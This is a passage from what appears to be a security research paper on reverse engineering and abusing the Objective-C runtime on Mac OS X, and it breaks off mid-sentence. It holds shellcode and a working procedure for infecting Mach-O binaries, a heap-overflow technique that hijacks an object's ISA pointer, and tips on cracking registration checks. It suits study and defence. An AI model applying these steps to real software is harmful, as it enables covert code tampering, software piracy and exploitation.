+will cover how to interact with the Objective-C runtime in the active
+process in order to understand program flow and assist in reverse
+engineering.
+
+The first tool we'll look at exists basically in the libobjc.A.dylib
+library itself. By setting the OBJC_HELP environment variable to anything
+non-zero and then running an Objective-C application we can see some
+options that are available to us.
+
+% OBJC_HELP=1 ./build/Debug/HelloWorld
+objc: OBJC_HELP: describe Objective-C runtime environment variables
+objc: OBJC_PRINT_OPTIONS: list which options are set
+objc: OBJC_PRINT_IMAGES: log image and library names as the runtime loads
+them
+objc: OBJC_PRINT_CONNECTION: log progress of class and category connections
+objc: OBJC_PRINT_LOAD_METHODS: log class and category +load methods as they
+are called
+objc: OBJC_PRINT_RTP: log initialization of the Objective-C runtime pages
+objc: OBJC_PRINT_GC: log some GC operations
+objc: OBJC_PRINT_SHARING: log cross-process memory sharing
+objc: OBJC_PRINT_CXX_CTORS: log calls to C++ ctors and dtors for instance
+variables
+objc: OBJC_DEBUG_UNLOAD: warn about poorly-behaving bundles when unloaded
+objc: OBJC_DEBUG_FRAGILE_SUPERCLASSES: warn about subclasses that may have
+been broken by subsequent changes to superclasses
+objc: OBJC_USE_INTERNAL_ZONE: allocate runtime data in a dedicated malloc
+zone
+objc: OBJC_ALLOW_INTERPOSING: allow function interposing of objc_msgSend()
+objc: OBJC_FORCE_GC: force GC ON, even if the executable wants it off
+objc: OBJC_FORCE_NO_GC: force GC OFF, even if the executable wants it on
+objc: OBJC_CHECK_FINALIZERS: warn about classes that implement -dealloc but
+not -finalize
+2006-04-22 12:08:17.544 HelloWorld[4831] Hello, World!
+
+This help is pretty self explanatory, in order to utilize each of this
+functionality you simply set the appropriate environment variable before
+running your Objective-C application. The runtime does the rest.
+
+Another environment variable which is useful for runtime analysis of
+Objective-C applications is "NSObjCMessageLoggingEnabled". If this variable
+is set to "Yes" then all objc_msgSend calls are logged to a file
+/tmp/msgSends-<pid>. This is also obeyed for suid Objective-C apps and very
+useful.
+
+The output below demonstrates the use of this variable to log objc_msgSend
+calls for our "HelloWorld" application.
+
+-[dcbz@megatron:~/code/HelloWorld/build]$
+NSObjCMessageLoggingEnabled=Yes ./hello 
+Hello World!
+-[dcbz@megatron:~/code/HelloWorld/build]$ cat /tmp/msgSends-6686 
++ NSRecursiveLock NSObject initialize
++ NSRecursiveLock NSObject new
++ NSRecursiveLock NSObject alloc
+....
++ Talker NSObject initialize
++ Talker NSObject alloc
++ Talker NSObject allocWithZone:
+- Talker NSObject init
+- Talker Talker say:
+- Talker NSObject release
+- Talker NSObject dealloc
+
+From this output it is easy to see exactly what our application was doing when
+we ran it.
+
+To take our message tracing functionality further, the "dtrace" application
+can be used to spy on Objective-C methods and functionality. Taken straight
+from the dtrace man-page, dtrace supports an Objective-C provider. The
+syntax for this is as follows:
+
+"""
+OBJECTIVE C PROVIDER
+    The Objective C provider is similar to the pid 
+    provider, and allows instrumentation of Objective C classes and 
+    methods. Objective C probe specifiers use the following format:
+
+    objcpid:[class-name[(category-name)]]:[[+|-]method-name]:[name]
+
+    pid  The id number of the process.
+
+    class-name
+       The name of the Objective C class.
+
+    category-name
+       The name of the category within the Objective C class.
+
+    method-name
+       The name of the Objective C method.
+
+    name  The name of the probe, entry, return, or an 
+          integer instruction offset within the method.
+
+OBJECTIVE C PROVIDER EXAMPLES
+    objc123:NSString:-*:entry
+       Every instance method of class NSString in process 123.
+
+    objc123:NSString(*)::entry
+       Every method on every category of class NSString in process
+       123.
+
+    objc123:NSString(foo):+*:entry
+       Every class method in NSString's foo category in process 123.
+
+    objc123::-*:entry
+       Every instance method in every class and category in process
+       123.
+
+    objc123:NSString(foo):-dealloc:entry
+       The dealloc method in the foo category of class NSString in
+       process 123.
+
+    objc123::method?with?many?colons:entry
+       The method method:with:many:colons in every class in
+       process 123. (A ? wildcard must be used to match colon 
+       characters inside of Objective C method names, as they would 
+       otherwise be parsed as the provider field separators.)
+"""
+
+This can be used as a message tracer for a particular class. You can even
+use this to write a simple fuzzer. There are plenty of tutorials out on the
+interwebz regarding writing .d scripts, and honestly, I'm still very new to
+it, so I'm going to leave this topic for now.
+
+I'd imagine that most people reading this paper are already pretty familiar
+with gdb. On Mac OS X, Apple have slightly modified gdb to have better
+support for Objective-C objects.
+
+The first notable change I can think of is that they've added the
+print-object command:
+
+(gdb) help print-object 
+Ask an Objective-C object to print itself.
+
+In order to show an example of this we can fire up gdb on our hello example
+Objective-C application..
+
+-[dcbz@megatron:~/code/HelloWorld/build]$ gdb hello 
+GNU gdb 6.3.50-20050815 (Apple version gdb-768) 
+(gdb) set disassembly-flavor intel
+(gdb) disas main
+Dump of assembler code for function main:
+0x00001f3d <main+0>:	push   ebp
+0x00001f3e <main+1>:	mov    ebp,esp
+0x00001f40 <main+3>:	push   ebx
+[...]
+0x00001f96 <main+89>:	mov    DWORD PTR [esp+0x4],edx
+0x00001f9a <main+93>:	mov    DWORD PTR [esp],ecx
+0x00001f9d <main+96>:	call   0x4005 <dyld_stub_objc_msgSend>
+0x00001fa2 <main+101>:	mov    edx,DWORD PTR [ebp-0xc]
+0x00001fa5 <main+104>:	lea    eax,[ebx+0x116b]
+[...]
+0x00001fb9 <main+124>:	add    esp,0x24
+0x00001fbc <main+127>:	pop    ebx
+0x00001fbd <main+128>:	leave  
+0x00001fbe <main+129>:	ret    
+End of assembler dump.
+
+.. and stick a breakpoint on one of the calls to objc_msgSend() from
+main().
+
+(gdb) b *0x00001f9d
+Breakpoint 1 at 0x1f9d
+(gdb) r
+Starting program: /Users/dcbz/code/HelloWorld/build/hello 
+
+Breakpoint 1, 0x00001f9d in main ()
+(gdb) stepi
+0x00004005 in dyld_stub_objc_msgSend ()
+(gdb) 
+0x94e0c670 in objc_msgSend ()
+(gdb) 
+0x94e0c674 in objc_msgSend ()
+(gdb) 
+0x94e0c678 in objc_msgSend ()
+
+We stepi a few instructions to populate our eax and ecx registers with the
+selector and id, as we've done previously in this paper.
+
+(gdb) po $eax
+<Talker: 0x103240>
+
+Then use the "po" command on our class pointer, which shows that we have an
+instance of the Talker class at 0x103240 on the heap.
+
+(gdb) x/x $eax
+0x103240:	0x00003000
+(gdb) po 0x3000
+Talker
+
+As you can see, if you use the "po" command on an ISA pointer, it simply
+spits out the name of the class.
+
+Some of the coolest techniques I've seen for manipulating the Objective-C
+runtime involve injecting an interpreter for the language of your choice
+into the address space of the running process, and then manipulating the
+classes in memory from there. None of the implementations of this that I've
+seen have been anywhere near as cool as F-Script Anywhere [18]. 
+
+It's hard to explain this tool in .txt format but if you have a Mac you
+should grab it and check it out. Basically when you run F-Script Anywhere
+you are presented with a list of all the running Objective-C applications
+on the system. You can select one and click the install button, to inject
+the F-Script interpreter into that process.
+
+On Leopard however, before you use this tool, you must set it to sgid
+procmod. This is due to the debugging restrictions around task_for_pid().
+To do this basically just:
+
+-[root@megatron:/Applications/F-Script Anywhere.app/Contents/MacOS]$
+chgrp procmod F-Script\ Anywhere 
+-[root@megatron:/Applications/F-Script Anywhere.app/Contents/MacOS]$
+chmod g+s F-Script\ Anywhere 
+
+Once the F-Script interpreter has been injected into your application, a
+"FSA" menu will appear in the menu bar at the top of your screen. This menu
+gives you the options:
+
+- New F-Script Workspace.
+- Browser for target.
+
+If you select "New F-Script Workspace" you are presented with a small
+terminal, in which to execute F-Script commands. The F-Script language is
+very simple and documented on their website [18]. It looks very similar to
+Objective-C itself. The interpreter window is running in the context of the
+application itself. Therefore any F-Script statements you make are capable
+of manipulating the classes etc within the target Objective-C application.
+
+But what if you don't know the name of your class in order to write
+F-Script to manipulate it? The "Browser" button at the bottom of the
+terminal will open up an object browser for our target application.
+Clicking on the "Classes" button at the top of this window will result in a
+list of all the classes in our address space being listed down the side.
+Clicking on any of the classes, will bring up all the attributes and
+methods for a particular class. (Methods are indicated with a colon. ie;
+"say:"). Double clicking on any of the methods in this window will result
+in the method being called, if arguments are required a window will pop up
+prompting you to supply them. This is very useful for exploring and testing
+the functionality of your target.
+
+Rather than clicking the "New F-Script Workspace" option in our FSA menu,
+you can select the "Browser for target" option. This will change your
+cursor into some kind of weird, clover/target/thing. Once this happens,
+clicking on any object in the gui, will pop up an object browser for the
+particular instance of the object. This way we can call methods/view
+attributes/see the address for the class etc. 
+
+You can do a lot more with F-Script anywhere, but the best place to learn
+is from the website [18] itself.
+
+------[ 4.3 - Cracking
+
+I'm not going to spend too much time on this topic as it's been covered
+pretty well by curious in [19], and I've published a little bit on it
+before in [13]. 
+
+However, when attempting to crack Objective-C apps it's always definitely
+worth running class-dump before you do anything else, and reading over the
+output. I can't count the number of times I've seen an application which
+has a method like createRegistrationKey() which you can call from F-Script
+Anywhere, or isRegistered() which is easily noppable. With all the
+Objective-C information at your disposal cracking a majority of
+applications on Mac OS X becomes quite trivial.
+
+Honestly, lets face it, people writing applications for Mac OS X care about the
+pretty gui, not the binary protection schemes available.
+
+------[ 4.4 - Objective-C Binary Infection
+
+Again I won't spend too much time on this section. Dino let me know
+recently that Vincenzo Iozzo (snagg@openssl.it) did a talk apparently at
+Deepsec last year on infecting the Objective-C structures in a Mach-O
+binary. I couldn't find any information on it on google, so i'll release my
+technique, however if you want to read a (probably much much better
+technique) then look up Vincenzo's work.
+
+The method I propose is quite simple, it involves looking at the __OBJC
+segment for any sections with padding, then writing our shellcode into each
+of them. Then basically overwriting a methods pointer with the address of
+the start of our shellcode. When the shellcode finishes executing, the
+original address is called.
+
+While this method is more complicated/convoluted than other Mach-O
+infection techniques, no attempt to modify the entry point takes place.
+This makes it harder to detect for the uninitiated.
+
+In order to demonstrate this procedure I wrote the following tiny assembly
+code. 
+
+-[dcbz@megatron:~/code]$ cat infected.asm 
+BITS 32
+SECTION .text
+_main:
+        xor     eax,eax
+        push    byte 0xa
+        jmp     short down
+up:
+        push    eax
+        mov     al,0x04
+        push    eax  ; fake
+        int     0x80
+        jmp     short end
+down:
+        call up
+db      "infected!",0x0a,0x00
+end:
+        int3
+
+-[dcbz@megatron:~/code]$ cat tst.c
+char sc[] = 
+"\x31\xc0\x6a\x0a\xeb\x08\x50\xb0\x04\x50\xcd\x80\xeb\x10\xe8\xf3"
+"\xff\xff\xff\x69\x6e\x66\x65\x63\x74\x65\x64\x21\x0a\x00\xcc";
+
+int main(int ac, char **av)
+{
+        void (*fp)() = sc;
+        fp();
+}
+-[dcbz@megatron:~/code]$ gcc tst.c -o tst
+tst.c: In function 'main':
+tst.c:7: warning: initialization from incompatible pointer type
+-[dcbz@megatron:~/code]$ ./tst
+infected!
+Trace/BPT trap
+
+As you can see when executed this code simply prints the string
+"infected!\n" using the write() system call.
+
+This will be the parasite code, our poor little HelloWorld project will be
+the host. 
+
+The first step in our infection process is to locate a little slab of space
+in the file where we can stick our code. Our code is around 30 bytes in
+length, so we'll need around 36 bytes in order to call the old address as
+well and complete the hook.
+
+Looking at the first two sections in our OBJC segment, the first has an
+offset of 8192 and a size of 0x30 the second has an offset of 8256. 
+
+Section
+  sectname __class
+   segname __OBJC
+      addr 0x00003000
+      size 0x00000030
+    offset 8192
+     align 2^5 (32)
+    reloff 0
+    nreloc 0
+     flags 0x00000000
+ reserved1 0
+ reserved2 0
+Section
+  sectname __meta_class
+   segname __OBJC
+      addr 0x00003040
+      size 0x00000030
+    offset 8256
+     align 2^5 (32)
+    reloff 0
+    nreloc 0
+     flags 0x00000000
+ reserved1 0
+ reserved2 0
+
+If we do the math on the first part:
+
+>>> 8192 + 0x30
+8240
+
+This means there's 16 bytes of padding in the file that we can use to store
+our code.  If needed, however since our code is quite a bit bigger than
+this it would be painful to squeeze it into the padding here.
+
+Fortunately we can utilize the  __OBJC.__image_info section. There is a
+tone of padding straight after this section.
+
+Section
+  sectname __image_info
+   segname __OBJC
+      addr 0x000030c8
+      size 0x00000008
+    offset 8392
+     align 2^2 (4)
+    reloff 0
+    nreloc 0
+     flags 0x00000000
+ reserved1 0
+ reserved2 0
+
+So this is where we can store our code. 
+But first, we need to increase the size of this section in the header.
+We can do this using HTE [20]. 
+
+**** section 7 ****
+section name                                      __image_info
+segment name                                      __OBJC
+virtual address                                   000030c8
+virtual size                                      00000008
+file offset                                       000020c8
+alignment                                         00000002
+relocation file offset                            00000000
+number of relocation entries                      00000000
+flags                                             00000000
+reserved1                                         00000000
+reserved2                                         00000000  
+
+We simply press the f4 key to edit this once we're in Mach-O header mode.
+
+**** section 7 ****
+section name                                      __image_info
+segment name                                      __OBJC
+virtual address                                   000030c8
+virtual size                                      00000030
+file offset                                       000020c8
+alignment                                         00000002
+relocation file offset                            00000000
+number of relocation entries                      00000000
+flags                                             00000000
+reserved1                                         00000000
+reserved2                                         00000000  
+
+Once this is done we save our file, and return to hex edit mode.
+In hex view we press f5, and type in our file offset. 0x20c8.
+Once our cursor is at this position we move to the right 8 bytes, and then
+press f4 to enter edit mode. Then we paste our string of bytes:
+
+31c06a0aeb0850b00450cd80eb10e8f3ffffff696e666563746564210a00cc
+
+Then we save our file and run it.
+
+000020c0 ec 1f 00 00 c9 1f 00 00-00 00 00 00 00 00 00 00 |??  ??          
+000020d0 31 c0 6a 0a eb 08 50 b0-04 50 cd 80 eb 10 e8 f3 |
+000020e0 ff ff ff 69 6e 66 65 63-74 65 64 21 0a 00 cc 00 |???infected!? ?
+000020f0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 |
+
+By running this binary in gdb, we can stick a breakpoint on the main
+function and then call our shellcode in memory.
+
+Breakpoint 1, 0x00001f41 in main ()
+(gdb) set $eip=0x30d0
+(gdb) c
+Continuing.
+infected!
+
+Program received signal SIGTRAP, Trace/breakpoint trap.
+0x000030ef in .objc_class_name_Talker ()
+
+As you see our shellcode executed fine. However we have got a problem.
+
+-[dcbz@megatron:~/code]$ ./hello
+objc[8268]: '/Users/dcbz/code/./hello' has inconsistently-compiled
+Objective-C code. Please recompile all code in it.
+Hello World!
+
+The Objective-C runtime has ratted us out!! 
+
+grep'ing the source code for this we can see the appropriate check:
+
+    // Make sure every copy of objc_image_info in this image is the same.
+    // This means same version and same bitwise contents.
+    if (result->info) {
+        const objc_image_info *start = result->info;
+        const objc_image_info *end =
+            (objc_image_info *)(info_size + (uint8_t *)start);
+        const objc_image_info *info = start;
+        while (info < end) {
+            // version is byte size, except for version 0
+            size_t struct_size = info->version;
+            if (struct_size == 0) struct_size = 2 * sizeof(uint32_t);
+            if (info->version != start->version  ||
+                0 != memcmp(info, start, struct_size))
+            {  
+                _objc_inform("'%s' has inconsistently-compiled Objective-C
+"
+                            "code. Please recompile all code in it.",
+                            _nameForHeader(header));
+            }
+            info = (objc_image_info *)(struct_size + (uint8_t *)info);
+        }
+    }
+
+     
+The way I got around this at the moment was to change the name of the
+section from __imagine_info to __1mage_info. Honestly I don't even
+understand why this section exists, but it works fine this way.
+
+**** section 7 ****
+section name                                      __1mage_info
+segment name                                      __OBJC
+virtual address                                   000030c8
+virtual size                                      00000030
+file offset                                       000020c8
+alignment                                         00000002
+relocation file offset                            00000000
+number of relocation entries                      00000000
+flags                                             00000000
+reserved1                                         00000000
+reserved2                                         00000000
+
+So now our shellcode is in memory, we need to gain control of execution
+somehow.
+
+The __inst_meth section contains a pointer to each of our methods. The way
+I plan to gain control of execution is to modify the pointer to our "say:"
+method with a pointer to our shellcode.
+
+Section
+  sectname __inst_meth
+   segname __OBJC
+      addr 0x00003070
+      size 0x00000014
+    offset 8304
+     align 2^2 (4)
+    reloff 0
+    nreloc 0
+     flags 0x00000000
+ reserved1 0
+ reserved2 0
+
+To test our theory out, we can first seek to the __inst_meth section in
+HTE...
+
+00002070 00 00 00 00 01 00 00 00-d0 1f 00 00 d5 1f 00 00 |    ?   ??  ??  
+00002080[2a 1f 00 00]07 00 00 00-10 00 00 00 bf 1f 00 00 |*?  ?   ?   ??
+00002090 a4 30 00 00 07 00 00 00-10 00 00 00 bf 1f 00 00 |?0  ?   ?   ??
+000020a0 30 20 00 00 00 00 00 00-00 00 00 00 01 00 00 00 |0           ?
+
+... And change our pointer to 0xdeadbeef as so:
+
+00002070 00 00 00 00 01 00 00 00-d0 1f 00 00 d5 1f 00 00 |    ?   ??  ??
+00002080[ef be ad de]07 00 00 00-10 00 00 00 bf 1f 00 00 |?????   ?   ??
+00002090 a4 30 00 00 07 00 00 00-10 00 00 00 bf 1f 00 00 |?0  ?   ?   ??
+000020a0 30 20 00 00 00 00 00 00-00 00 00 00 01 00 00 00 |0           ?
+
+This way when we start up our application and test it...
+
+(gdb) r
+Starting program: /Users/dcbz/code/hello 
+Reading symbols for shared libraries +++++...................... done
+
+Program received signal EXC_BAD_ACCESS, Could not access memory.
+Reason: KERN_INVALID_ADDRESS at address: 0xdeadbeef
+0xdeadbeef in ?? ()
+(gdb) 
+
+... we can see that execution control is pretty straight forward.
+
+Now if we change this value from 0xdeadbeef to the address of our shellcode
+in the __1mage_info section. (0x30c8) and run the binary, we can see the
+results.
+
+-[dcbz@megatron:~/code]$ ./hello
+infected!
+Trace/BPT trap
+
+As you can see, we have successfully gained control of execution and
+executed our shellcode, however the SIGTRAP caused by the int3 in our code
+isn't very inconspicuous. In order to fix this we'll need to add some code
+to jump back to the previous value of our method. The following
+instructions take care of this nicely:
+
+nasm > mov ecx,0xdeadbeef
+00000000  B9EFBEADDE        mov ecx,0xdeadbeef
+nasm > jmp ecx
+00000000  FFE1              jmp ecx
+
+Another thing we need to take care of before resuming execution is
+restoring the stack and registers to their previous state. This way when
+we resume execution it will be like our code never executed.
+
+The final version of our payload looks something like:
+
+BITS 32
+SECTION .text
+_main:
+        pusha
+        xor     eax,eax
+        push    byte 0xa
+        jmp     short down
+up:
+        push    eax
+        mov     al,0x04
+        push    eax  ; fake
+        int     0x80
+        jmp     short end
+down:
+        call up
+db      "infected!",0x0a,0x00
+end:
+        push    byte 16
+        pop     eax
+        add     esp,eax
+        popa
+        mov     ecx,0xdeadbeef
+        jmp     ecx
+
+If we assembly it, and change 0xdeadbeef to the address of our old function
+0x1f2a the code looks like this.
+
+6031c06a0aeb0850b00450cd80eb10e8f3ffffff696e666563746564210a006a105801c4
+61b92a1f0000ffe1
+
+We inject this into our binary using hte again...
+
+000020c0 ec 1f 00 00 c9 1f 00 00-60 31 c0 6a 0a eb 08 50 
+000020d0 b0 04 50 cd 80 eb 10 e8-f3 ff ff ff 69 6e 66 65
+000020e0 63 74 65 64 21 0a 00 6a-10 58 01 c4 61 b9 2a 1f 
+000020f0 00 00 ff e1 00 00 00 00-00 00 00 00 00 00 00 00 
+
+... and run the binary.
+
+-[dcbz@megatron:~/code]$ ./hello
+infected!
+Hello World!
+
+Presto! Our binary is infected. I'm not going to bother implementing this
+in assembly right now, but it would be easy enough to do.
+
+--[ 5 - Exploiting Objective-C Applications
+
+Hopefully at this stage you're fairly familiar with the Objective-C
+runtime. In this section we'll look at some of the considerations of
+exploiting an Objective-C application on Mac OS X.
+
+In order to explore this, we'll first start by looking at what happens when
+an object allocation (alloc method) occurs for an Objective-C class.
+
+So basically, when the alloc method is called ([Object alloc]) the
+_internal_class_creatInstanceFromZone function is called in the Objective-C
+runtime. The source code for this function is shown below.
+
+/***********************************************************************
+* _internal_class_createInstanceFromZone.  Allocate an instance of the
+* specified class with the specified number of bytes for indexed
+* variables, in the specified zone.  The isa field is set to the
+* class, C++ default constructors are called, and all other fields are zeroed.
+**********************************************************************/
+__private_extern__ id
+_internal_class_createInstanceFromZone(Class cls, size_t extraBytes,
+                                       void *zone)
+{
+    id obj;
+    size_t size;
+
+    // Can't create something for nothing
+    if (!cls) return nil;
+
+    // Allocate and initialize
+    size = _class_getInstanceSize(cls) + extraBytes;
+    if (UseGC) {
+        obj = (id) auto_zone_allocate_object(gc_zone, size,
+                                        AUTO_OBJECT_SCANNED, false, true);
+    } else if (zone) {
+        obj = (id) malloc_zone_calloc (zone, 1, size);
+    } else {
+        obj = (id) calloc(1, size);
+    }
+    if (!obj) return nil;
+
+    // Set the isa pointer
+    obj->isa = cls;
+
+    // Call C++ constructors, if any.
+    if (!object_cxxConstruct(obj)) {
+        // Some C++ constructor threw an exception. 
+        if (UseGC) {
+            auto_zone_retain(gc_zone, obj);  
+		// gc free expects retain count==1
+        }
+        free(obj);
+        return nil;
+    }
+
+    return obj;
+}
+
+As you can see, this function basically just looks up the size of the class
+and uses calloc to allocate some (zero filled) memory for it on the heap.
+
+From the code above we can see that the calls to calloc etc allocate memory 
+from the default malloc zone. This means that the class meta-data and
+contents are stored in amongst any other allocations the program makes.
+Therefore, any overflows on the heap in an objc application are liable
+to end up overflowing into objc meta-data. We can utilize this to gain
+control of execution.
+
+/***********************************************************************
+* _objc_internal_zone.
+* Malloc zone for internal runtime data.
+* By default this is the default malloc zone, but a dedicated zone is 
+* used if environment variable OBJC_USE_INTERNAL_ZONE is set.
+**********************************************************************/
+
+However, if you set the OBJC_USE_INTERNAL_ZONE environment variable before
+running the application, the Objective-C runtime will use it's own malloc
+zone. This means the objc meta-data will be stored in another mapping, and
+will stop these attacks. This is probably worth doing for any services you
+run regularly (written in objective-c) just to mix up the address space a
+bit.
+
+The first thing we'll look at, in regards to this process, is how the class
+size is calculated. This will determine which region on the heap this
+allocation takes place from. (Tiny/Small/Large/Huge). For more information
+on how the userspace heap implementation (Bertrand's malloc) works, you can
+check my heap exploitation techniques paper [11].]
+
+As you saw in the code above, when the 
+_internal_class_createInstanceFromZone function wants to determine the size
+of a class, the first step it takes is to call the _class_getInstanceSize() 
+function.
+
+This basically just looks up the instance_size attribute from inside our
+class struct. This means we can easily predict which region of the heap our
+particular object will reside.
+
+Ok, so now we're familiar with how the object is allocated we can explore
+this in memory.
+
+The first step is to copy the HelloWorld sample application we made earlier
+to ofex1 as so...
+
+-[dcbz@megatron:~/code]$ cp -r HelloWorld/ ofex1
+
+We can then modify the hello.c file to perform an allocation with malloc()
+prior to the class being alloc'ed.
+
+The code then uses strcpy() to copy the first argument to this program into
+our small buffer on the heap. With a large argument this should overflow
+into our objective-c object.
+
+include <stdio.h>
+#include <stdlib.h>
+#import "Talker.h"
+
+int main(int ac, char **av)
+{
+        char *buf = malloc(25);
+        Talker *talker = [[Talker alloc] init];
+        printf("buf: 0x%x\n",buf);
+        printf("talker: 0x%x\n",talker);
+        if(ac != 2) {
+                exit(1);
+        }
+        strcpy(buf,av[1]);
+        [talker say: "Hello World!"];
+        [talker release];
+}
+
+Now if we recompile our sample code, and fire up gdb, passing in a long
+argument, we can begin to investigate what's needed to gain control of
+execution.
+
+(gdb) r `perl -e'print "A"x5000'`
+Starting program: /Users/dcbz/code/ofex1/build/hello `perl -e'print
+"A"x5000'`
+buf: 0x103220
+talker: 0x103260
+
+Program received signal EXC_BAD_ACCESS, Could not access memory.
+Reason: KERN_INVALID_ADDRESS at address: 0x41414161
+0x9470d688 in objc_msgSend ()
+
+As you can see from the output above, buf is 64 bytes lower on the heap
+than talker. This means overflowing 68 bytes will overwrite the isa pointer
+in our class struct.
+
+This time we run the program again, however we stick 0xcafebabe where our
+isa pointer should be.
+
+(gdb) r `perl -e'print "A"x64,"\xbe\xba\xfe\xca"'`
+The program being debugged has been started already.
+Start it from the beginning? (y or n) y
+Starting program: /Users/dcbz/code/ofex1/build/hello `perl -e'print
+"A"x64,"\xbe\xba\xfe\xca"'`
+buf: 0x1032c0
+talker: 0x103300
+
+Program received signal EXC_BAD_ACCESS, Could not access memory.
+Reason: KERN_INVALID_ADDRESS at address: 0xcafebade
+0x9470d688 in objc_msgSend ()
+(gdb) x/i $pc
+0x9470d688 <objc_msgSend+24>:   mov    edi,DWORD PTR [edx+0x20]
+(gdb) i r edx
+edx            0xcafebabe       -889275714
+
+We have now controlled the ISA pointer and a crash has occured offsetting
+this by 0x20 and reading. However, we're unsure at this stage what exactly
+is going on here. 
+
+In order to explore this, let's take a look at the source code for
+objc_msgSend again.
+
+// load receiver and selector
+        movl    selector(%esp), %ecx
+        movl    self(%esp), %eax
+
+// check whether selector is ignored
+        cmpl    $ kIgnore, %ecx
+        je      LMsgSendDone            // return self from %eax
+
+// check whether receiver is nil
+        testl   %eax, %eax
+        je      LMsgSendNilSelf
+
+// receiver (in %eax) is non-nil: search the cache
+LMsgSendReceiverOk:
+	// -( nemo )- :: move our overwritten ISA pointer to edx.
+        movl    isa(%eax), %edx         // class = self->isa 
+	// -( nemo )- :: This is where our crash takes place.
+	// in the CachLookup macro.
+        CacheLookup WORD_RETURN, MSG_SEND, LMsgSendCacheMiss
+        movl    $kFwdMsgSend, %edx      // flag word-return for _objc_msgForward
+        jmp     *%eax                   // goto *imp
+
+
+From the code above we can determine that our crash took place within the
+CacheLookup macro. This means in order to gain control of execution from
+here we're going to need a little understanding of how method caching works
+for Objective-C classes.
+
+Let's start by taking a look at our objc_class struct again. 
+
+       struct objc_class
+        { 
+           struct objc_class* isa;
+           struct objc_class* super_class;
+           const char* name;
+           long version;
+           long info;
+           long instance_size;
+           struct objc_ivar_list* ivars;
+           struct objc_method_list** methodLists;
+           struct objc_cache* cache;
+           struct objc_protocol_list* protocols;
+        };
+
+We can see above that 32 bytes (0x20) into our struct is the cache pointer
+(a pointer to a struct objc_cache instance). Therefore the instruction that
+our crash took place in, is derefing the isa pointer (that we overwrote)
+and trying to access the cache attribute of this struct.
+
+Before we get into how the CacheLookup macro works, lets quickly
+familiarize ourselves with how the objc_cache struct looks.
+
+struct objc_cache {
+    unsigned int mask;            /* total = mask + 1 */
+    unsigned int occupied;
+    cache_entry *buckets[1];
+};
+
+The two elements we're most concerned about are the mask and buckets. The
+mask is used to resolve an index into the buckets array. I'll go into that
+process in more detail as we read the implementation of this. The buckets
+array is made up of cache_entry structs (shown below).
+
+typedef struct {
+    SEL name;     // same layout as struct old_method
+    void *unused;
+    IMP imp;  // same layout as struct old_method
+} cache_entry;
+
+Now let's step through the CachLookup source now and we can look at the
+process of checking the cache and what we control with an overflow.
+
+.macro  CacheLookup
+
+// load variables and save caller registers.
+
+        pushl   %edi                    // save scratch register
+        movl    cache(%edx), %edi       // cache = class->cache
+        pushl   %esi                    // save scratch register
+
+This initial load into edi is where our bad access is performed. We are
+able to control edx here (the isa pointer) and therefore control edi.
+
+        movl    mask(%edi), %esi        // mask = cache->mask
+
+First the cache struct is dereferenced and the "mask" is moved into esi.
+We control the outcome of this, and therefore control the mask.
+
+        leal    buckets(%edi), %edi     // buckets = &cache->buckets
+
+The address of the buckets array is moved into edi with lea. This will come
+straight after our mask and occupied fields in our fake objc_cache struct.
+
+        movl    %ecx, %edx              // index = selector
+        shrl    $$2, %edx               // index = selector >> 2
+
+The address of the selector (c string) which was passed to objc_msgSend()
+as the method name is then moved into ecx. We do not control this at all.
+I mentioned earlier that selectors are basically c strings that have been
+registered with the runtime. The process we are looking at now, is used to
+turn the Selector's address into an index into the buckets array. This
+allows for quick location of our method. As you can see above, the first
+step of this is to shift the pointer right by 2.
+
+        andl    %esi, %edx              // index &= mask
+        movl    (%edi, %edx, 4), %eax   // method = buckets[index]
+
+Next the mask is applied. Typically the mask is set to a small value
+in order to reduce our index down to a reasonable size. Since we control
+the mask, we can control this process quite effectively.
+
+Once the index is determined it is used in conjunction with the base
+address of the buckets array in order to move one of the bucket entries
+into eax.
+
+        testl   %eax, %eax              // check for end of bucket
+        je      LMsgSendCacheMiss_$0_$1_$2      // go to cache miss code
+
+If the bucket does not exist, it is assumed that a CacheMiss was performed,
+and the method is resolved manually using the technique we described early
+on in this paper.
+
+        cmpl    method_name(%eax), %ecx // check for method name match
+        je      LMsgSendCacheHit_$0_$1_$2       // go handle cache hit
+
+However if the bucket is non-zero, the first element is retrieved which
+should be the same selector that was passed in. If that is the cache, then
+it is assumed that we've found our IMP function pointer, and it is called.
+
+        addl    $$1, %edx                       // bump index ...
+        jmp     LMsgSendProbeCache_$0_$1_$2 // ... and loop
+
+Otherwise, the index is incremented and the whole process is attempted
+again until a NULL bucket is found or a CacheHit occurs.
+
+Ok, so taking this all home, lets apply what we know to our vulnerable
+sample application.
+
+We've accomplished step #1, we've overflown and controlled the isa pointer.
+The next thing we need to do is find a nice patch of memory where we can
+position our fake objective-c class information and predict it's address.
+
+There are many different techniques for this and almost all of them are
+situational. For a remote attack, you may wish to spray the heap, filling
+all the gaps in until you can predict what's at a static location. However
+in the case of a local overflow, the most reliable technique I know I wrote
+about in my "a XNU Hope" paper [13]. Basically the undocumented system call
+SYS_shared_region_map_file_np is used to map portions of a file into a
+shared mapping across all the processes on the system. Unfortunately after
+I published that paper, Apple decided to add a check to the system call to
+make sure that the file being mapped was owned by root. KF originally
+pointed this out to me when leopard was first released, and my macbook was
+lying broken under my bed. He also noted, that there were many root owned
+writable files on the system generally and so he could bypass this quite
+easily. 
+
+-[dcbz@megatron:~]$ ls -lsa /Applications/.localized 
+8 -rw-rw-r--  1 root  admin  8 Apr 11 19:54 /Applications/.localized
+
+An example of this is the /Applications/.localized file. This is at least
+writeable by the admin user, and therefore will serve our purpose in this
+case. However I have added a section to this paper (5.1) which demonstrates
+a generic technique for reimplementing this technique on Leopard. I got
+sidetracked while writing this paper and had to figure it out.
+
+For now we'll just use /Applications/.localized however, in order to reduce
+the complexity of our example.
+
+Ok so now we know where we want to write our data, but we need to work out
+exactly what to write. The lame ascii diagram below hopefully demonstrates
+my idea for what to write.
+
+       ,_____________________,
+ISA -> |                     |  
+       |        mask=0       |<-,
+       |      occupied       |  |
+   ,---|      buckets        |  |
+   '-->| fake bucket: SEL    |  |
+       | fake bucket: unused |  |
+       | fake bucket: IMP    |--|--,
+       |                     |  |  |
+       |                     |  |  |
+ISA+32>|   cache pointer     |--'  |
+       |                     |     |
+       |     SHELLCODE       |<----'
+       '_____________________'
+
+So basically what will happen, the ISA will be dereferenced and 32 will be
+added to retrieve the cache pointer which we control. The cache pointer
+will then point back to our first address where the mask value will be
+retrieved. I used the value 0x0 for the mask, this way regardless of the
